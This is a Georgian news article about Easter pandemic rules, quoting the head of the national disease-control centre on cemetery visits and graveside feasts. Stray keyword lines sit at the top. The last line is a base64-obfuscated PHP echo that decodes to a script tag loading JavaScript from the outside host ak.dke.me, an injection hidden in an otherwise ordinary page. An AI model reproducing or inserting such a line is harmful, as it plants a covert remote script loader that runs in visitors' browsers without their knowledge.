celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელ ამირან გამყრელიძის განმარტებით, სოფელში ადამიანს არავინ აუკრძალავს საფლავზე გასვლას, მაგრამ სოფლის რწმუნებული ყველას სთხოვს, დიდი სუფრა არ იყოს. გამყრელიძემ განმარტება გააკეთა აღდგომის ბრწყინვალე დღესასწაულთან დაკავშირებით და თქვა, რომ მეტი აქცენტი კეთდება თბილისსა და დიდ ქალაქებზე.
 
„ბრწყინვალე შვიდეული დიდი ხნის ტრადიციაა, ორშაბათ-სამშაბათს გავდივართ საფლავზე და პატივს მივაგებთ ჩვენს მიცვალებულებს. ამავე დროს გვაქვს ტრადიცია, რომელიც მთლად მოსაწონი არ არის. იქ იშლება სუფრა, მიიღება ალკოჰოლი, გარკვეულ შემთხვევებში გადაჭარბებითაც.
 
არავინ უშლის ადამიანებს მთელი კვირის განმავლობაში ერთი-ორი ადამიანი მივიდეს საფლავზე და დაანთოს სანთელი. განსაკუთრებული მონიტორინგი იქნება არასასიამოვნო ტრადიციაზე, რაც გვაქვს და ეს არის სუფრის გაშლა“, - განაცხადა ამირან გამყრელიძემ ტელეკომპანია "ფორმულას" ეთერში.  
 
კითხვას - წითელი კვერცხით საფლავზე მისულ ადამიანს პოლიცია დააჯარიმებს თუ - არა, NCDC-ს ხელმძღვანელი ასე პასუხობს: „ამას გააკონტროლებს შსს, პოლიცია ყველასთან იქნება ძალიან მოკრძალებული. თხოვნა იქნება მოქალაქეებისთვის, რომ ორშაბათ-სამშაბათს თავი შევიკავოთ საფლავზე გასვლისგან. ყველა ამ ორ დღეს ცდილობდა სასაფლაოზე გასვლას; ხომ შეიძლება გადანაწილდეს?! სოფელში, ადამიანი რომ სასაფლაოზე გავა, იმას არავინ აუკრძალავს საფლავზე გასვლას, მაგრამ სოფლის რწმუნებული მიმართავს და სთხოვს, რომ არ იყოს დიდი სუფრა“.
1486
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");